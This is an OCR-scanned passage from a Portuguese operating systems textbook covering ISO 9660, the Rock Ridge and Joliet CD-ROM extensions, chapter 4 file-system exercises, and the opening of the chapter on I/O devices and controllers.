tório em um CD-ROM refira-se a um arquivo localiza- 
do em outro CD-ROM no conjunto. Dessa maneira, é 
possível construir um diretório-mestre no primeiro CD- 
-ROM que liste todos os arquivos que estejam em todos 
os CD-ROMs no conjunto completo. 

O campo marcado L na Figura 4.35 mostra o tama- 
nho do nome do arquivo em bytes. Ele é seguido pelo 
nome do próprio arquivo. Um nome de arquivo consiste 
em um nome base, um ponto, uma extensão, um ponto 
e vírgula e um número binário de versão (1 ou 2 bytes). 
O nome base e a extensão podem usar letras maiúsculas, 
os dígitos 0-9 e o caractere sublinhado. Todos os outros 
caracteres são proibidos para certificar-se de que todos 
os computadores possam lidar com todos os nomes de 
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arquivos. O nome base pode ter até oito caracteres; a ex- 
tensão até três caracteres. Essas escolhas foram ditadas 
pela necessidade de tornar o padrão compatível com o 
MS-DOS. Um nome de arquivo pode estar presente em 
um diretório múltiplas vezes, desde que cada um tenha 
um número de versão diferente. 

Os últimos dois campos nem sempre estão presen- 
tes. O campo Preenchimento é usado para forçar que 
toda entrada de diretório seja um número par de bytes 
a fim de alinhar os campos numéricos de entradas sub- 
sequentes em limites de 2 bytes. Se o preenchimento 
for necessário, um byte O é usado. Por fim, temos o 
campo Uso do sistema. Sua função e tamanho são in- 
definidos, exceto que ele deve conter um número par 
de bytes. Sistemas diferentes o utilizam de maneiras 
diferentes. O Macintosh, por exemplo, mantém os flags 
do Finder nele. 

Entradas dentro de um diretório são listadas em or- 
dem alfabética, exceto para as duas primeiras entradas. 
A primeira entrada é para o próprio diretório. A segunda 
é para o pai. Nesse sentido, elas são similares para as 
entradas de diretório . e .. do UNIX. Os arquivos em si 
não precisam estar na ordem do diretório. 

Não há um limite explícito para o número de entra- 
das em um diretório. No entanto, há um limite para a 
profundidade de aninhamento. A profundidade máxima 
de aninhamento de um diretório é oito. Esse limite foi 
estabelecido arbitrariamente para simplificar algumas 
implementações. 

O ISO 9660 define o que são chamados de três ní- 
veis. O nível 1 é o mais restritivo e especifica que os 
nomes de arquivos sejam limitados a 8 + 3 caracteres 
como descrevemos, e também exige que todos os arqui- 
vos sejam contíguos como descrevemos. Além disso, 
ele especifica que os nomes dos diretórios sejam limita- 
dos a oito caracteres sem extensões. O uso desse nível 
maximiza as chances de que um CD-ROM seja lido em 
todos os computadores. 

O nível 2 relaxa a restrição de tamanho. Ele permite 
que arquivos e diretórios tenham nomes de até 31 carac- 
teres, mas ainda do mesmo conjunto de caracteres. 

O nível 3 usa os mesmos limites de nomes do nível 
2, mas relaxa parcialmente o pressuposto de que os ar- 
quivos tenham de ser contíguos. Com esse nível, um ar- 
quivo pode consistir em várias seções (extensões), cada 
uma como uma sequência contígua de blocos. A mesma 
sequência pode ocorrer múltiplas vezes em um arquivo 
e pode ocorrer em dois ou mais arquivos. Se grandes 
porções de dados são repetidas em vários arquivos, o 
nível 3 oferecerá alguma otimização de espaço ao não 
exigir que os dados estejam presentes múltiplas vezes. 
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Extensões Rock Ridge 


Como vimos, o ISO 9660 é altamente restritivo em 
várias maneiras. Logo depois do seu lançamento, as 
pessoas na comunidade UNIX começaram a trabalhar 
em uma extensão a fim de tornar possível representar 
os sistemas de arquivos UNIX em um CD-ROM. Es- 
sas extensões foram chamadas de Rock Ridge, em ho- 
menagem à cidade no filme de Mel Brooks, Banzé no 
Oeste (Blazing Saddles), provavelmente porque um dos 
membros do comitê gostou do filme. 

As extensões usam o campo Uso do sistema para 
possibilitar a leitura dos CD-ROMs Rock Ridge em 
qualquer computador. Todos os outros campos mantêm 
seu significado ISO 9660 normal. Qualquer sistema que 
não conheça as extensões Rock Ridge apenas as ignora 
e vê um CD-ROM normal. 

As extensões são divididas nos campos a seguir: 


1. PX — atributos POSIX. 


2. PN — Números de dispositivo principal e 
secundário. 

3. SL — Ligação simbólica. 

4. NM — Nome alternativo. 

5. CL — Localização do filho. 

6. PL — Localização do pai. 

7. RE — Realocação. 


8. TF — Estampas de tempo (Time stamps). 


O campo PX contém o padrão UNIX para bits de 
permissão rwxrwxrwx para o proprietário, grupo e ou- 
tros. Ele também contém os outros bits contidos na 
palavra de modo, como os bits SETUID e SETGID, e 
assim por diante. 

Para permitir que dispositivos sejam representados em 
um CD-ROM, o campo PN está presente. Ele contém os 
números de dispositivos principais e secundários associa- 
dos com o arquivo. Dessa maneira, os conteúdos do dire- 
tório /dev podem ser escritos para um CD-ROM e mais 
tarde reconstruídos corretamente no sistema de destino. 

O campo SL é para ligações simbólicas. Ele permite 
que um arquivo em um sistema refira-se a um arquivo 
em um sistema diferente. 

O campo mais importante é NM. Ele permite que um 
segundo nome seja associado com o arquivo. Esse nome 
não está sujeito às restrições de tamanho e conjunto de 
caracteres do ISO 9660, tornando possível expressar 
nomes de arquivos UNIX arbitrários em um CD-ROM. 

Os três campos seguintes são usados juntos para 
contornar o limite de oito diretórios que podem ser ani- 
nhados no ISO 9660. Usando-os é possível especificar 
que um diretório seja realocado, e dizer onde ele vai 
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na hierarquia. Trata-se efetivamente de uma maneira de 
contornar o limite de profundidade artificial. 

Por fim, o campo TF contém as três estampas de 
tempo incluídas em cada i-node UNIX, a saber o ho- 
rário que o arquivo foi criado, modificado e acessado 
pela última vez. Juntas, essas extensões tornam pos- 
sível copiar um sistema de arquivos UNIX para um 
CD-ROM e então restaurá-lo corretamente para um 
sistema diferente. 


Extensões Joliet 


A comunidade UNIX não foi o único grupo que não 
gostou do ISO 9660 e queria uma maneira de estendê-lo. 
A Microsoft também o achou restritivo demais (embora 
tenha sido o próprio MS-DOS da Microsoft que causou 
a maior parte das restrições em primeiro lugar). Portan- 
to, a Microsoft inventou algumas extensões chamadas 
Joliet. Elas foram projetadas para permitir que os sis- 
temas de arquivos Windows fossem copiados para um 
CD-ROM e então restaurados, precisamente da mesma 
maneira que o Rock Ridge foi projetado para o UNIX. 
Virtualmente todos os programas que executam sob o 
Windows e usam CD-ROMs aceitam Joliet, incluindo 
programas que gravam em CDs regraváveis. Em geral, 
esses programas oferecem uma escolha entre os vários 
níveis de ISO 9660 e Joliet. 

As principais extensões oferecidas pelo Joliet são: 


1. Nomes de arquivos longos. 

2. Conjunto de caracteres Unicode. 

3. Aninhamento de diretórios mais profundo que 
oito níveis. 

4. Nomes de diretórios com extensões. 


A primeira extensão permite nomes de arquivos de 
até 64 caracteres. A segunda extensão capacita o uso do 
conjunto de caracteres Unicode para os nomes de ar- 
quivos. Essa extensão é importante para que o software 
possa ser empregado em países que não usam o alfabeto 
latino, como Japão, Israel e Grécia. Como os caracteres 
Unicode ocupam 2 bytes, o nome de arquivo máximo 
em Joliet ocupa 128 bytes. 

Assim como no Rock Ridge, a limitação sobre ani- 
nhamentos de diretórios foi removida no Joliet. Os di- 
retórios podem ser aninhados o mais profundamente 


4.7 Resumo 


Quando visto de fora, um sistema operacional é uma 
coleção de arquivos e diretórios, mais as operações 


quanto necessário. Por fim, nomes de diretórios podem 
ter extensões. Não fica claro por que essa extensão foi 
incluída, já que os diretórios do Windows virtualmente 
nunca usam extensões, mas talvez um dia venham a usar. 


4.6 Pesquisas em sistemas de arquivos 


Os sistemas de arquivos sempre atraíram mais pes- 
quisas do que outras partes do sistema operacional e até 
hoje é assim. Conferências inteiras como FAST, MSST 
e NAS são devotadas em grande parte a sistemas de 
arquivos e armazenamento. Embora os sistemas de ar- 
quivos-padrão sejam bem compreendidos, ainda há bas- 
tante pesquisa sendo feita sobre backups (SMALDONE 
et al., 2013; e WALLACE et al., 2012), cache (KOL- 
LER et al.; Oh, 2012; e ZHANG et al., 2013a), exclusão 
de dados com segurança (WEI et al., 2011), compressão 
de arquivos (HARNIK et al., 2013), sistemas de arqui- 
vos para dispositivos flash (NO, 2012; PARK e SHEN, 
2012; e NARAYANAN, 2009), desempenho (LEVEN- 
THAL, 2013; e SCHINDLER et al., 2011), RAID 
(MOON e REDDY, 2013), confiabilidade e recupera- 
ção de erros (CHIDAMBARAM etal., 2013; MA et al., 
2013; MCKUSICK, 2012; e VAN MOOLENBROEK 
et al., 2012), sistemas de arquivos em nivel do usuá- 
rio (RAJGARHIA e GEHANI, 2010), verificações de 
consistência (FRYER et al., 2012) e sistemas de arqui- 
vos com controle de versões (MASHTIZADEH et al., 
2013). Apenas mensurar o que está realmente aconte- 
cendo em um sistema de arquivos também é um tópico 
de pesquisa (HARTER et al., 2012). 

A segurança é um tópico sempre presente (BOTE- 
LHO et al., 2013; LI et al., 2013c; e LORCH et al., 
2013). Por outro lado, um novo tópico refere-se aos sis- 
temas de arquivos na nuvem (MAZUREK et al., 2012; 
e VRABLE et al., 2012). Outra área que tem ganhado 
atenção recentemente é a procedência — o monitora- 
mento da história dos dados, incluindo de onde vêm, 
quem é o proprietário e como eles foram transformados 
(GHOSHAL e PLALE, 2013; e SULTANA e BERTI- 
NO, 2013). Manter os dados seguros e úteis por décadas 
também interessa às empresas que têm um compromis- 
so legal de fazê-lo (BAKER et al., 2006). Por fim, ou- 
tros pesquisadores estão repensando a pilha do sistema 
de arquivos (APPUSWAMY et al., 2011). 


sobre eles. Arquivos podem ser lidos e escritos, diretó- 
rios criados e destruídos e arquivos podem ser movidos 


de diretório para diretório. A maioria dos sistemas de ar- 
quivos modernos dá suporte a um sistema de diretórios 
hierárquico no qual os diretórios podem ter subdiretó- 
rios, e estes podem ter “subsubdiretórios” ad infinitum. 

Quando visto de dentro, um sistema de arquivos 
parece bastante diferente. Os projetistas do sistema 
de arquivos precisam estar preocupados com como o 
armazenamento é alocado e como o sistema monitora 
qual bloco vai com qual arquivo. As possibilidades in- 
cluem arquivos contíguos, listas encadeadas, tabelas de 
alocação de arquivos e i-nodes. Sistemas diferentes têm 
estruturas de diretórios diferentes. Os atributos podem 
ficar nos diretórios ou em algum outro lugar (por exem- 
plo, um i-node). O espaço de disco pode ser gerencia- 
do usando listas de espaços livres ou mapas de bits. A 


PROBLEMAS 


1. Dê cinco nomes de caminhos diferentes para o arquivo 
/etc./passwd. (Dica: lembre-se das entradas de diretório 
RE ADA P 

2. No Windows, quando um usuário clica duas vezes sobre 
um arquivo listado pelo Windows Explorer, um progra- 
ma é executado e dado aquele arquivo como parâmetro. 
Liste duas maneiras diferentes através das quais o siste- 
ma operacional poderia saber qual programa executar. 

3. Nos primeiros sistemas UNIX, os arquivos executáveis 
(arquivos a.out) começavam com um número mágico, 
bem específico, não um número escolhido ao acaso. Es- 
ses arquivos começavam com um cabeçalho, seguido 
por segmentos de texto e dados. Por que você acha que 
um número bem específico era escolhido para os arqui- 
vos executáveis, enquanto os outros tipos de arquivos ti- 
nham um número mágico mais ou menos aleatório como 
primeiro caractere? 

4. A chamada de sistema open no UNIX é absolutamente 
essencial? Quais seriam as consequências de não a ter? 

5. Sistemas que dão suporte a arquivos sequenciais sem- 
pre têm uma operação para voltar arquivos para trás 
(rewind). Os sistemas que dão suporte a arquivos de 
acesso aleatório precisam disso, também? 

6. Alguns sistemas operacionais fornecem uma chamada 
de sistema rename para dar um nome novo para um ar- 
quivo. Existe alguma diferença entre usar essa chamada 
para renomear um arquivo e apenas copiar esse arquivo 
para um novo com o nome novo, seguido pela remoção 
do antigo? 

7. Em alguns sistemas é possível mapear parte de um 
arquivo na memória. Quais restrições esses sistemas 
precisam impor? Como é implementado esse mapea- 
mento parcial? 
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confiabilidade do sistema de arquivos é reforçada a par- 
tir da realização de cópias incrementais e um programa 
que possa reparar sistemas de arquivos danificados. O 
desempenho do sistema de arquivos é importante e pode 
ser incrementado de diversas maneiras, incluindo cache 
de blocos, leitura antecipada e a colocação cuidadosa 
de um arquivo próximo do outro. Sistemas de arquivos 
estruturados em diário (log) também melhoram o de- 
sempenho fazendo escritas em grandes unidades. 

Exemplos de sistemas de arquivos incluem ISO 
9660, MS-DOS e UNIX. Eles diferem de muitas manei- 
ras, incluindo pelo modo de monitorar quais blocos vão 
para quais arquivos, estrutura de diretórios e gerencia- 
mento de espaço livre em disco. 


8. Um sistema operacional simples dá suporte a apenas 
um único diretório, mas permite que ele tenha nomes 
arbitrariamente longos de arquivos. Seria possível si- 
mular algo próximo de um sistema de arquivos hierár- 
quico? Como? 

9. No UNIX e no Windows, o acesso aleatório é reali- 
zado por uma chamada de sistema especial que move 
o ponteiro “posição atual” associado com um arquivo 
para um determinado byte nele. Proponha uma forma 
alternativa para o acesso aleatório sem ter essa chama- 
da de sistema. 

10. Considere a árvore de diretório da Figura 4.8. Se /usr/ 
Jim é o diretório de trabalho, qual é o nome de caminho 
absoluto para o arquivo cujo nome de caminho relativo 
é ../ast/x? 

11. Aalocação contígua de arquivos leva à fragmentação de 
disco, como mencionado no texto, pois algum espaço 
no último bloco de disco será desperdiçado em arqui- 
vos cujo tamanho não é um número inteiro de blocos. 
Estamos falando de uma fragmentação interna, ou exter- 
na? Faça uma analogia com algo discutido no capítulo 
anterior. 

12. Descreva os efeitos de um bloco de dados corrompido 
para um determinado arquivo: (a) contíguo, (b) encade- 
ado e (c) indexado (ou baseado em tabela). 

13. Uma maneira de usar a alocação contígua do disco e não 
sofrer com espaços livres é compactar o disco toda vez 
que um arquivo for removido. Já que todos os arquivos 
são contíguos, copiar um arquivo exige uma busca e 
atraso rotacional para lê-lo, seguido pela transferência 
em velocidade máxima. Escrever um arquivo de volta 
exige o mesmo trabalho. Presumindo um tempo de bus- 
ca de 5 ms, um atraso rotacional de 4 ms, uma taxa de 
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transferência de 80 MB/s e o tamanho de arquivo médio 
de 8 KB, quanto tempo leva para ler um arquivo para a 
memória principal e então escrevê-lo de volta para o dis- 
co na nova localização? Usando esses números, quanto 
tempo levaria para compactar metade de um disco de 
16 GB? 

Levando em conta a resposta da pergunta anterior, a 
compactação do disco faz algum sentido? 

Alguns dispositivos de consumo digitais precisam arma- 
zenar dados, por exemplo, como arquivos. Cite um dispo- 
sitivo moderno que exija o armazenamento de arquivos e 
para o qual a alocação contígua seria uma boa ideia. 
Considere o i-node mostrado na Figura 4.13. Se ele con- 
tém 10 endereços diretos e esses tinham 8 bytes cada e 
todos os blocos do disco eram de 1024 KB, qual seria o 
tamanho do maior arquivo possível? 

Para uma determinada turma, os históricos dos estudan- 
tes são armazenados em um arquivo. Os registros são 
acessados aleatoriamente e atualizados. Presuma que 
o histórico de cada estudante seja de um tamanho fixo. 
Qual dos três esquemas de alocação (contíguo, encadea- 
do e indexado por tabela) será o mais apropriado? 
Considere um arquivo cujo tamanho varia entre 4 KB e 4 
MB durante seu tempo de vida. Qual dos três esquemas 
de alocação (contíguo, encadeado e indexado por tabela) 
será o mais apropriado? 

Foi sugerido que a eficiência poderia ser incrementada e 
o espaço de disco poupado armazenando os dados de um 
arquivo curto dentro do i-node. Para o i-node da Figura 
4.13, quantos bytes de dados poderiam ser armazenados 
dentro dele? 

Duas estudantes de computação, Carolyn e Elinor, estão 
tendo uma discussão sobre i-nodes. Carolyn sustenta que 
as memórias ficaram tão grandes e baratas que, quando 
um arquivo é aberto, é mais simples e mais rápido bus- 
car uma cópia nova do i-node na tabela de i-nodes, em 
vez de procurar na tabela inteira para ver se ela já está 
ali. Elinor discorda. Quem está certa? 

Nomeie uma vantagem de ligações estritas sobre liga- 
ções simbólicas e uma vantagem de ligações simbólicas 
sobre ligações estritas. 

Explique como as ligações estritas e as ligações flexíveis 
diferem em relação às alocações de i-nodes. 

Considere um disco de 4 TB que usa blocos de 4 KB e o 
método da lista de livres. Quantos endereços de blocos 
podem ser armazenados em um bloco? 

O espaço de disco livre pode ser monitorado usando-se 
uma lista de livres e um mapa de bips. Endereços de 
disco exigem D bits. Para um disco com B blocos, F dos 
quais estão disponíveis, estabeleça a condição na qual a 
lista de livres usa menos espaço do que o mapa de bits. 
Para D tendo um valor de 16 bits, expresse a resposta 
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como uma percentagem do espaço de disco que precisa 
estar livre. 

O começo de um mapa de bits de espaço livre fica assim 
após a partição de disco ter sido formatada pela primeira 
vez: 1000 0000 0000 0000 (o primeiro bloco é usado 
pelo diretório-raiz). O sistema sempre busca por blocos 
livres começando no bloco de número mais baixo, então 
após escrever o arquivo 4, que usa seis blocos, o mapa 
de bits fica assim: 1111 1110 0000 0000. Mostre o mapa 
de bits após cada uma das ações a seguir: 

(a) O arquivo B é escrito usando cinco blocos. 

(b) O arquivo 4 é removido. 

(c) O arquivo C é escrito usando oito blocos. 

(d) O arquivo B é removido. 

O que aconteceria se o mapa de bits ou a lista de livres 
contendo as informações sobre blocos de disco livres 
fossem perdidos por uma queda no computador? Exis- 
te alguma maneira de recuperar-se desse desastre ou é 
“adeus, disco”? Discuta suas respostas para os sistemas 
de arquivos UNIX e FAT-16 separadamente. 

O trabalho noturno de Oliver Owl no centro de com- 
putadores da universidade é mudar as fitas usadas para 
os backups de dados durante a noite. Enquanto espera 
que cada fita termine, ele trabalha em sua tese que prova 
que as peças de Shakespeare foram escritas por visitan- 
tes extraterrestres. Seu processador de texto executa no 
sistema sendo copiado, pois esse é o único que eles têm. 
Há algum problema com esse arranjo? 

Discutimos como realizar cópias incrementais detalhada- 
mente no texto. No Windows é fácil dizer quando copiar 
um arquivo, pois todo arquivo tem um bit de arquiva- 
mento. Esse bit não existe no UNIX. Como os programas 
de backup do UNIX sabem quais arquivos copiar? 
Suponha que o arquivo 21 na Figura 4.25 não foi modi- 
ficado desde a última cópia. De qual maneira os quatro 
mapas de bits da Figura 4.26 seriam diferentes? 

Foi sugerido que a primeira parte de cada arquivo UNIX 
fosse mantida no mesmo bloco de disco que o seu i-no- 
de. Qual a vantagem que isso traria? 

Considere a Figura 4.27. Seria possível que, para algum 
número de bloco em particular, os contadores em ambas 
as listas tivessem o valor 2? Como esse problema pode- 
ria ser corrigido? 

O desempenho de um sistema de arquivos depende da 
taxa de acertos da cache (fração de blocos encontrados na 
cache). Se for necessário 1 ms para satisfazer uma solici- 
tação da cache, mas 40 ms para satisfazer uma solicitação 
se uma leitura de disco for necessária, dê uma fórmula 
para o tempo médio necessário para satisfazer uma soli- 
citação se a taxa de acerto é A. Represente graficamente 
essa função para os valores de h variando de 0 a 1,0. 
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Para um disco rígido USB externo ligado a um computa- 
dor, o que é mais adequado: uma cache de escrita direta 
ou uma cache de bloco? 

Considere uma aplicação em que os históricos dos es- 
tudantes são armazenados em um arquivo. A aplicação 
pega a identidade de um estudante como entrada e sub- 
sequentemente lê, atualiza e escreve o histórico cor- 
respondente; isso é repetido até a aplicação desistir. A 
técnica de “leitura antecipada de bloco” seria útil aqui? 
Considere um disco que tem 10 blocos de dados come- 
cando do bloco 14 até o 23. Deixe 2 arquivos no disco: fl 
e f2. A estrutura do diretório lista que os primeiros blocos 
de dados de fl e f2 são respectivamente 22 e 16. Levando- 
-se em consideração as entradas de tabela FAT a seguir, 
quais são os blocos de dados designados para fl e f2? 
(14,18); (15,17); (16,23); (17,21); (18,20); (19,15); 
(20, —1); (21, —1); (22,19); (23,14). 

Nessa notação, (x, y) indicam que o valor armazenado na 
entrada de tabela x aponta para o bloco de dados y. 
Considere a ideia por trás da Figura 4.21, mas agora para 
um disco com um tempo de busca médio de 6 ms, uma 
taxa rotacional de 15.000 rpm e 1.048.576 bytes por tri- 
lha. Quais são as taxas de dados para os tamanhos de 
blocos de 1 KB, 2 KB e 4 KB, respectivamente? 

Um determinado sistema de arquivos usa blocos de dis- 
co de 4 KB. O tamanho de arquivo médio é 1 KB. Se to- 
dos os arquivos fossem exatamente de 1 KB, qual fração 
do espaço do disco seria desperdiçada? Você acredita 
que o desperdício para um sistema de arquivos real será 
mais alto do que esse número ou mais baixo do que ele? 
Explique sua resposta. 

Levando-se em conta um tamanho de bloco de 4 KB e 
um valor de endereço de ponteiro de disco de 4 bytes, 
qual é o maior tamanho de arquivo (em bytes) que pode 
ser acessado usando 10 endereços diretos e um bloco 
indireto? 

Arquivos no MS-DOS têm de competir por espaço na ta- 
bela FAT-16 na memória. Se um arquivo usa k entradas, 
isto é, k entradas que não estão disponíveis para qual- 
quer outro arquivo, qual restrição isso ocasiona sobre o 
tamanho total de todos os arquivos combinados”? 

Um sistema de arquivos UNIX tem blocos de 4 KB e 
endereços de disco de 4 bytes. Qual é o tamanho de ar- 
quivo máximo se os i-nodes contêm 10 entradas diretas, 
e uma entrada indireta única, dupla e tripla cada? 
Quantas operações de disco são necessárias para buscar 
o i-node para um arquivo com o nome de caminho /usr/ 
ast/courses/os/handout.t? Presuma que o i-node para o 
diretório-raiz está na memória, mas nada mais ao lon- 
go do caminho está na memória. Também presuma que 
todo diretório caiba em um bloco de disco. 
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Em muitos sistemas UNIX, os i-nodes são mantidos no 
inicio do disco. Um projeto alternativo é alocar um i- 
-node quando um arquivo é criado e colocar o i-node no 
começo do primeiro bloco do arquivo. Discuta os prós e 
contras dessa alternativa. 

Escreva um programa que inverta os bytes de um ar- 
quivo, para que o último byte seja agora o primeiro e o 
primeiro, o último. Ele deve funcionar com um arqui- 
vo arbitrariamente longo, mas tente torná-lo razoavel- 
mente eficiente. 

Escreva um programa que comece em um determinado 
diretório e percorra a árvore de arquivos a partir da- 
quele ponto registrando os tamanhos de todos os arqui- 
vos que encontrar. Quando houver concluído, ele deve 
imprimir um histograma dos tamanhos dos arquivos 
usando uma largura de célula especificada como para- 
metro (por exemplo, com 1024, tamanhos de arquivos 
de O a 1023 são colocados em uma célula, 1024 a 2047 
na seguinte etc.). 

Escreva um programa que escaneie todos os diretórios 
em um sistema de arquivos UNIX e encontre e localize 
todos os i-nodes com uma contagem de ligações estritas 
de duas ou mais. Para cada arquivo desses, ele lista jun- 
tos todos os nomes que apontam para o arquivo. 
Escreva uma nova versão do programa /s do UNIX. 
Essa versão recebe como argumentos um ou mais no- 
mes de diretórios e para cada diretório lista todos os ar- 
quivos nele, uma linha por arquivo. Cada campo deve 
ser formatado de uma maneira razoável considerando 
o seu tipo. Liste apenas o primeiro endereço de disco, 
se houver. 

Implemente um programa para mensurar o impacto de 
tamanhos de buffer no nível de aplicação nos tempos 
de leitura. Isso consiste em ler para e escrever a partir 
de um grande arquivo (digamos, 2 GB). Varie o tama- 
nho do buffer de aplicação (digamos, de 64 bytes para 
4 KB). Use rotinas de mensuração de tempo (como 
gettimeofday e getitimer no UNIX) para mensurar o 
tempo levado por diferentes tamanhos de buffers. Ana- 
lise os resultados e relate seus achados: o tamanho do 
buffer faz uma diferença para o tempo de escrita total e 
tempo por escrita? 

Implemente um sistema de arquivos simulado que será 
completamente contido em um único arquivo regular 
armazenado no disco. Esse arquivo de disco conterá di- 
retórios, i-nodes, informações de blocos livres, blocos 
de dados de arquivos etc. Escolha algoritmos adequados 
para manter informações sobre blocos livres e para alo- 
car blocos de dados (contíguos, indexados, encadeados). 
Seu programa aceitará comandos de sistema do usuário 
para criar/remover diretórios, criar/remover/abrir arqui- 
vos, ler/escrever de/para um arquivo selecionado e listar 
conteúdos de diretórios. 


CAPÍTULO 


lém de oferecer abstrações como processos, es- 

paços de endereçamentos e arquivos, um sistema 

operacional também controla todos os dispositivos 

de E/S (entrada/saída) do computador. Ele deve 

emitir comandos para os dispositivos, interceptar 
interrupções e lidar com erros. Também deve fornecer 
uma interface entre os dispositivos e o resto do sistema 
que seja simples e fácil de usar. Na medida do possível, 
a interface deve ser a mesma para todos os dispositivos 
(independentemente do dispositivo). O código de E/S 
representa uma fração significativa do sistema opera- 
cional total. Como o sistema operacional gerencia a E/S 
é o assunto deste capítulo. 

Este capítulo é organizado da seguinte forma: exa- 
minaremos primeiro alguns princípios do hardware de 
E/S e então o software de E/S em geral. O software de 
E/S pode ser estruturado em camadas, com cada uma 
tendo uma tarefa bem definida. Examinaremos cada 
uma para ver o que fazem e como se relacionam entre si. 

Em seguida, exploraremos vários dispositivos de E/S 
detalhadamente: discos, relógios, teclados e monitores. 
Para cada dispositivo, examinaremos o seu hardware 
e software. Por fim, estudaremos o gerenciamento de 
energia. 


5.1 Princípios do hardware de E/S 


Diferentes pessoas veem o hardware de E/S de ma- 
neiras diferentes. Engenheiros elétricos o veem em 
termos de chips, cabos, motores, suprimento de ener- 
gia e todos os outros componentes físicos que com- 
preendem o hardware. Programadores olham para a 





interface apresentada ao software — os comandos que 
o hardware aceita, as funções que ele realiza e os erros 
que podem ser reportados de volta. Neste livro, estamos 
interessados na programação de dispositivos de E/S, e 
não em seu projeto, construção ou manutenção; portan- 
to, nosso interesse é saber como o hardware é progra- 
mado, não como ele funciona por dentro. Não obstante 
isso, a programação de muitos dispositivos de E/S está 
muitas vezes intimamente ligada à sua operação interna. 
Nas próximas três seções, apresentaremos uma pequena 
visão geral sobre hardwares de E/S à medida que estes 
se relacionam com a programação. Podemos considerar 
isso como uma revisão e expansão do material introdu- 
tório da Seção 1.3. 


5.1.1 Dispositivos de E/S 


Dispositivos de E/S podem ser divididos de modo 
geral em duas categorias: dispositivos de blocos e dis- 
positivos de caractere. O primeiro armazena infor- 
mações em blocos de tamanho fixo, cada um com seu 
próprio endereço. Tamanhos de blocos comuns variam 
de 512 a 65.536 bytes. Todas as transferências são em 
unidades de um ou mais blocos inteiros (consecutivos). 
A propriedade essencial de um dispositivo de bloco é 
que cada bloco pode ser lido ou escrito independente- 
mente de todos os outros. Discos rígidos, discos Blu-ray 
e pendrives são dispositivos de bloco comuns. 

Se você observar bem de perto, o limite entre dispo- 
sitivos que são endereçáveis por blocos e aqueles que 
não são não é bem definido. Todo mundo concorda que 
um disco é um dispositivo endereçável por bloco, pois 
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não importa a posição em que se encontra o braço no 
momento, é sempre possível buscar em outro cilindro e 
então esperar que o bloco solicitado gire sob a cabeça. 
Agora considere um velho dispositivo de fita magnética 
ainda usado, às vezes, para realizar backups de disco 
(porque fitas são baratas). Fitas contêm uma sequência 
de blocos. Se o dispositivo de fita receber um coman- 
do para ler o bloco N, ele sempre pode rebobiná-la e ir 
direto até chegar ao bloco N. Essa operação é análo- 
ga a um disco realizando uma busca, exceto por levar 
muito mais tempo. Também pode ou não ser possível 
reescrever um bloco no meio de uma fita. Mesmo que 
fosse possível usar as fitas como dispositivos de bloco 
com acesso aleatório, isso seria forçar o ponto de algum 
modo: em geral elas não são usadas dessa maneira. 

O outro dispositivo de E/S é o de caractere. Um dis- 
positivo de caractere envia ou aceita um fluxo de ca- 
racteres, desconsiderando qualquer estrutura de bloco. 
Ele não é endereçável e não tem qualquer operação de 
busca. Impressoras, interfaces de rede, mouses (para 
apontar), ratos (para experimentos de psicologia em la- 
boratórios) e a maioria dos outros dispositivos que não 
são parecidos com discos podem ser vistos como dispo- 
sitivos de caracteres. 

Esse esquema de classificação não é perfeito. Alguns 
dispositivos não se enquadram nele. Relógios, por exem- 
plo, não são endereçáveis por blocos. Tampouco geram 
ou aceitam fluxos de caracteres. Tudo o que fazem é cau- 
sar interrupções em intervalos bem definidos. As telas 


mapeadas na memória não se enquadram bem no modelo 
também. Tampouco as telas de toque, quanto a isso. Ain- 
da assim, o modelo de dispositivos de blocos e de ca- 
ractere é suficientemente geral para ser usado como uma 
base para fazer alguns dos softwares do sistema operacio- 
nal que tratam de E/S independentes dos dispositivos. O 
sistema de arquivos, por exemplo, lida apenas com dis- 
positivos de blocos abstratos e deixa a parte dependente 
de dispositivos para softwares de nível mais baixo. 

Dispositivos de E/S cobrem uma ampla gama de ve- 
locidades, o que coloca uma pressão considerável sobre 
o software para desempenhar bem através de muitas or- 
dens de magnitude em taxas de transferência de dados. 
A Figura 5.1 mostra as taxas de dados de alguns dispo- 
sitivos comuns. A maioria desses dispositivos tende a 
ficar mais rápida com o passar do tempo. 


5.1.2 Controladores de dispositivos 


Unidades de E/S consistem, em geral, de um compo- 
nente mecânico e um componente eletrônico. É possível 
separar as duas porções para permitir um projeto mais 
modular e geral. O componente eletrônico é chamado 
de controlador do dispositivo ou adaptador. Em com- 
putadores pessoais, ele muitas vezes assume a forma de 
um chip na placa-mãe ou um cartão de circuito impresso 
que pode ser inserido em um slot de expansão (PCle). O 
componente mecânico é o dispositivo em si. O arranjo é 
mostrado na Figura 1.6. 


[FIGURA 5.1] Algumas taxas de dados típicas de dispositivos, placas de redes e barramentos. 





















































Dispositivo Taxa de dados 
Teclado 10 bytes/s 
Mouse 100 bytes/s 
Modem 56 K 7 KB/s 
Scanner em 300 dpi 1 MB/s 
Filmadora camcorder digital 3,5 MB/s 
Disco Blu-ray 4x 18 MB/s 
Wireless 802.11n 37,5 MB/s 
USB 2.0 60 MB/s 
FireWire 800 100 MB/s 
Gigabit Ethernet 125 MB/s 
Drive de disco SATA 3 600 MB/s 
USB 3.0 625 MB/s 
Barramento SCSI Ultra 5 640 MB/s 
Barramento de faixa única PCle 3.0 985 MB/s 
Barramento Thunderbolt2 2,5 GB/s 
Rede SONET OC-768 5 GB/s 











O cartão controlador costuma ter um conector, no 
qual um cabo levando ao dispositivo em si pode ser co- 
nectado. Muitos controladores podem lidar com dois, 
quatro ou mesmo oito dispositivos idênticos. Se a in- 
terface entre o controlador e o dispositivo for padrão, 
seja um padrão oficial ANSI, IEEE ou ISO — ou um 
padrão de facto —, então as empresas podem produzir 
controladores ou dispositivos que se enquadrem aque- 
la interface. Muitas empresas, por exemplo, produzem 
controladores de disco compatíveis com as interfaces 
SATA, SCSI, USB, Thunderbolt ou FireWire (IEEE 
1394). 

A interface entre o controlador e o dispositivo mui- 
tas vezes é de nível muito baixo. Um disco, por exem- 
plo, pode ser formatado com 2 milhões de setores de 
512 bytes por trilha. No entanto, o que realmente sai 
da unidade é um fluxo serial de bits, começando com 
um preâmbulo, então os 4096 bits em um setor, e por 
fim uma soma de verificação (checksum), ou código de 
correção de erro (ECC — Error Correcting Code). 
O preâmbulo é escrito quando o disco é formatado e 
contém o cilindro e número de setor, e dados similares, 
assim como informações de sincronização. 

O trabalho do controlador é converter o fluxo serial 
de bits em um bloco de bytes, assim como realizar qual- 
quer correção de erros necessária. O bloco de bytes é 
tipicamente montado primeiro, bit por bit, em um buffer 
dentro do controlador. Após a sua soma de verificação 
